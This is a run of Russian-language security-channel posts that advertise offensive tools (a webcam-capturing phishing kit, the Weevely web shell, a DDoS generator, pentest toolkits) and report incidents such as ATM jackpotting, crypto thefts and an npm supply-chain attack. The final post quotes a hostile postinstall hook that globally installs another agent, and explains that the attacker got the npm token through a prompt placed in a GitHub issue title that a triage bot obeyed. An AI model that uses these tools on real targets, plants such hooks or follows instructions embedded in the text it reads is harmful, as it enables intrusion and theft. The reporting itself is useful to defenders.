☁️ Phishing: инструмент захвата камеры с помощью фишинга

WishFish – это инструмент для взлома веб-камер или фронтальных камер с чужих компьютеров и телефонов

— Он позволяет генерировать различные фишинговые веб-ссылки, которые могут сфотографировать фронтальную камеру жертвы и дать целевой IP-адрес

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

🐕 BloodHound — как увидеть скрытые угрозы в вашей Active Directory

Представьте, что вы администратор безопасности в крупной компании

В вашей Active Directory сотни пользователей, групп и компьютеров, связанных сложными отношениями

— Как найти уязвимости в этом лабиринте? Вот где на помощь приходит BloodHound – инструмент, который превращает хаос разрешений в понятную карту угроз

🗄 Читать статью – линк.

// Не хакинг, а ИБ

✋ Шифрование метаданных в мессенджере: HMAC-SHA256 анонимные пары, timing obfuscation и отравление собственных логов

— В этой статье автор подробно объяснит инженерные решения, к которым пришёл в ходе защиты метаданных: от криптографических примитивов до С++ кода и SQL-схемы

А также рассмотрим, где подход имеет ограничения и чем отличается от того, что делают Signal и Tor

Содержание статьи:

1. Зачем вообще шифровать метаданные?
2. Модель угроз: что знает сервер
3. Архитектура: четыре уровня скрытности
4. HMAC-SHA256 Anonymous Pairs — ядро системы
5. Отравление собственных логов
6. Push-уведомления как канал утечки
7. Timing Obfuscation: случайные задержки против корреляционного анализа
8. Мердж настроек: дипломатия приватности
9. Хранение и production-реалии
10. Полная картина: что видит атакующий с root-доступом к серверу
11. Сравнение с аналогами: Signal, Tor, Matrix
12. Честные ограничения и что не работает
13. Заключение и ссылки

🗄 Читать статью – линк.

// Не хакинг, а ИБ

📝 Шпаргалка по Web Security

Awesome OSCP – это тщательно подобранная коллекция ресурсов, инструментов, руководств и шпаргалок, специально созданная для помощи в подготовке к экзамену Offensive Security Certified Professional, но невероятно полезная и для любого пентестера.

Ключевые разделы:
— Подготовка и основы;
— Фундаментальные навыки;
— Enumeration и разведка;
— Эксплуатация;
— Пост-эксплуатация.

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

🦺 В 2025 году из банкоматов похитили более 20 млн долларов

ФБР опубликовало бюллетень, в котором предупреждает о резком росте атак типа джекпоттинг (jackpotting) на банкоматы в США

⚠️ Только в 2025 году зафиксировано более 700 подобных инцидентов, а суммарный ущерб превысил 20 млн долларов

Суть джекпоттинга: злоумышленники получают физический доступ к банкомату, устанавливают на него вредоносное ПО, и малварь напрямую отдает команды модулю выдачи наличных

Обычно вся операция занимает считанные минуты, а финансовые организации и операторы банкоматов узнают о произошедшем, когда деньги уже похищены

— Главным инструментом атакующих правоохранители считают малварь Ploutus, которая существует уже более 10 лет

🗄 Источник – линк.

// Не хакинг, а ИБ

🧰 Набор инструментов для тестирования на проникновение

В данном репозитории собрали:
– Анонимное сокрытие инструментов
– Инструменты сбора информации
– Генераторы списков слов
– Инструменты беспроводной атаки
– Инструменты для внедрения SQL-запросов
– Инструменты фишинговой атаки
– Инструменты веб-атак
– Инструменты для последующей эксплуатации
– Инструменты судебной экспертизы
– Инструменты для создания полезной нагрузки
– Платформы для использования эксплойтов
– Обратный инжиниринг
– Сканирование веб-страниц
– Инструменты для проведения DDOS-атак
– Инструменты удаленного администратора
(RAT)
– Инструменты XSS-атаки
– Инструменты для стеганографии

Репозиторий постоянно обновляется!

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

😈 Хакинг бытовой техники: от реверса стиралки к созданию открытого сервисного ПО

— Сегодня разберем доклад Hacking Washing Machines с конференции 39C3 и посмотрим, как мелкая бытовая неисправность привела к полноценному реверсу стиралки, а затем – к созданию свободной утилиты, которая заменяет закрытый фирменный софт для ремонта техники Miele

Доклад получился объемным, поэтому для удобства читателей он разделен на две части:
1. Первая про опыт исследования техники Miele
2. Второй про шину D-Bus как универсальную отмычку к экосистеме бренда BSH

🗄 Читать статью – линк.
🗄 Хакинг бытовой техники: одна шина, чтобы управлять всеми – линк.

// Не хакинг, а ИБ

🖥 Ваша повседневная шпаргалка по Matplotlib

— Предлагаем вашему вниманию полное руководство по визуализации на Python

Matplotlib – библиотека на Python для визуализации данных двумерной и трёхмерной графикой

Он имеет отличную поддержку множеством сред, таких, как веб-серверы приложений, графические библиотеки пользовательского интерфейса, Jupiter Notebook, iPython Notebook и оболочка iPython

Выкладывать еще материалы по программированию?
💊 – да
🗿 – не стоит

🗄 Шпаргалка – линк.

// Не хакинг, а ИБ

❗️ Веб-шелл для автоматического заражения сети

Weevely – это веб-шелл командной строки, динамически распространяемый по сети во время выполнения

Просто закиньте PHP скрипт, и программа обеспечит похожий на ssh терминал даже в ограниченном окружении

— Оставляющий мало следов агент и более 30 модулей формируют расширяемый фреймворк для:
⏺администрирования веб-аккаунтов;
⏺постэксплуатационного повышения привилегий веб-серверов;
⏺и латерального продвижения по сети.

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

😂 Налоговая служба Южной Кореи случайно раскрыла seed-фразу для изъятого криптокошелька

Национальная налоговая служба Южной Кореи (National Tax Service, NTS) отчиталась о результатах операции против 124 крупных неплательщиков налогов

⚠️ В ходе рейдов удалось конфисковать активы на общую сумму 8,1 млрд вон (~5,6 млн $), включая наличные, предметы роскоши и криптовалюту

— Для наглядности они решили приложить к своему пресс-релизу фотографии изъятого у неплательщиков имущества

Среди них оказался снимок аппаратного кошелька Ledger, а также на фото попала и рукописная заметка с seed-фразой от него

Результат не заставил себя ждать: спустя пару часасов неизвестные вывели с конфискованного кошелька 4 млн токенов Pre-Retogeum (PRTG), оценивавшихся примерно в 4,8 млн $ на момент кражи

🗄 Источник – линк.

// Не хакинг, а ИБ

🛡 Большое руководство по работе с Angie

— Этот цикл статей будет посвящен веб‑серверу Angie

Angie – это современный веб-сервер и обратный прокси с открытым исходным кодом, основанный на веб-сервере Nginx

Проект был инициирован в 2013 году компанией Angie Software с целью улучшить возможности Nginx, а также расширить его функциональность для большего удобства использования в корпоративных и облачных средах

Навигация по циклу:

🗄 Почему стоит переходить на Angie.
🗄 Установка Angie из пакетов и в докере.
🗄 Переезд с Nginx на Angie. Пошаговая инструкция.
🗄 Настройка location в Angie. Разделение динамических и статических запросов.
🗄 Перенаправления в Angie: return, rewrite и примеры их применения.
🗄 Сжатие текста в Angie: статика, динамика, производительность.
🗄 Серверное кэширование в Angie: тонкости настройки.
🗄 Настройка TLS в Angie: безопасность и скорость.
🗄 Настройка Angie в роли обратного HTTP-прокси.
🗄 Балансировка нагрузки для HTTP(S) в Angie.
🗄 Мониторинг Angie с помощью Console Light и API.
🗄 Балансировка и проксирование L4-трафика в Angie.
🗄 Клиентское кэширование в Angie.
🗄 Динамические группы проксируемых серверов в Angie.
🗄 Мониторинг Angie с Prometheus и Grafana.
🗄 Отказоустойчивый кластер Angie с VRRP и Keepalived.
🗄 Контроль доступа в Angie.
🗄 Аутентификация клиентов в Angie с помощью TLS-сертификатов.
🗄 Кастомизация Angie (njs, Lua, Perl).
🗄 Запуск CGI-скриптов в Angie.
🗄 Защита от DoS-атак в Angie стандартными модулями.
🗄 Защита от DoS-атак в Angie (дополнительные средства).

// Не хакинг, а ИБ

📝 Awesome Hacking — золотая жила для специалистов по безопасности

Awesome Hacking – это кураторская подборка из более чем 50 тематических списков ресурсов по информационной безопасности

Создатели собрали в одном месте:
⏺Инструменты для пентеста
⏺Обучающие материалы
⏺Примеры эксплойтов
⏺Лабораторные среды
⏺Исследования по безопасности

Проект насчитывает почти 100 тысяч звезд на GitHub и регулярно обновляется сообществом

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

❗️ Инструмент имитации DDoS-атак

DDoS-Ripper – инструмент для тестирования сети, который имитирует атаки Distributed Denial of Service (DDoS)

— Он генерирует высокие объёмы HTTP-запросов с одной машины с помощью нескольких параллельных потоков

DDoS-Ripper совместим с несколькими платформами, включая Linux, Windows, MacOS и Termux

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

😈 Сын правительственного подрядчика украл у Службы маршалов криптовалюту на 46 млн долларов

— Арестован сын правительственного подрядчика США, Джон Дагита, которого обвиняют в хищении более 46 млн долларов в криптовалюте у Службы маршалов

Джон Дагита – сын Дина Дагиты, президента и генерального директора компании Command Services & Support (CMDSS), базирующейся в Вирджинии

⚠️ С октября 2024 года эта фирма помогала Службе маршалов США управлять и распоряжаться конфискованными у преступников цифровыми активами

«В конце января 2026 года я раскрыл, как Джон украл более 46 млн долларов в конфискованных криптоактивах у правительства США, злоупотребив доступом к ресурсам CMDSS — компании его отца, у которой был контракт со Службой маршалов.

Затем Джон несколько раз дразнил меня через свой Telegram-канал и проводил dust-атаки на мой публичный кошелек, используя украденные средства. Ну и кто смеется теперь, Джон?» — написал известный блокчейн-аналитик ZachXBT

По данным ZachXBT, Дагита сам себя раскрыл во время конфликта с другим злоумышленником в приватном чате Telegram, который был записан

В этой переписке он продемонстрировал, что способен в реальном времени перемещать крупные суммы между двумя криптокошельками

Дальнейший анализ позволил связать эти кошельки с правительственными активами, конфискованными после взлома биржи Bitfinex

🗄 Источник – линк.

// Не хакинг, а ИБ

⚡️РОЗЫГРЫШ В ЧЕСТЬ ОТКРЫТИЯ В MAX

Теперь наши каналы доступны не только здесь, но и на платформе MAX.  В честь этого события разыгрываем три приза, которые усилят вашу защиту в сети.

ПРИЗОВОЙ ФОНД:
⚠️ 1 МЕСТО: YubiKey 5 Series
Физический ключ, который делает двухфакторную аутентификацию неуязвимой. Никакой фишинг и слив паролей не страшны, пока ключ у вас.

⚠️ 2 МЕСТО: SATOSHI VPN на 1 год
Полная анонимность и шифрование трафика. Ваши данные под защитой в любых сетях.

⚠️ 3 МЕСТО: Книга "Хакерская самооборона" (Андрей Жуков, 2026)
Актуальная новинка по активной обороне. Учитесь думать как хакер, чтобы защищаться от реальных угроз.

📎 УСЛОВИЯ ПРОСТЫЕ:
Быть подписанным на этот канал (где вы читаете пост).

Быть подписанным на все 4 канала в MAX по ссылкам ниже.
→ max.ru/becaps
→ max.ru/cyberins
→ max.ru/itbook_library
→ max.ru/nsis_cybersec

📌 Нажать кнопку "Участвую" под этим постом.

Итоги подведём ровно через 20 дней с помощью рандомайзера 28.03.26 14:00MSK.

😂 Агент под прикрытием: как один заголовок-промпт на GitHub помог взломать 4000 компьютеров

17 февраля в репозитории npm была опубликована версия cline@2.3.0. С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт

Лишь в файле package.json притаилась одна лишняя строчка:

 "postinstall": "npm install -g openclaw@latest"



В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw

— Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса – пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа

Но самое поразительное здесь не сама начинка вредоноса – весь фокус в том, как именно злоумышленник раздобыл npm-токен – ключ от всех дверей

⚠️ Оказалось, он просто спрятал инструкцию (промпт) прямо в заголовке тикета на GitHub

Бот, занимавшийся сортировкой заявок, прочитал этот заголовок, принял его за приказ и послушно исполнил

🗄 Читать статью – линк.

// Не хакинг, а ИБ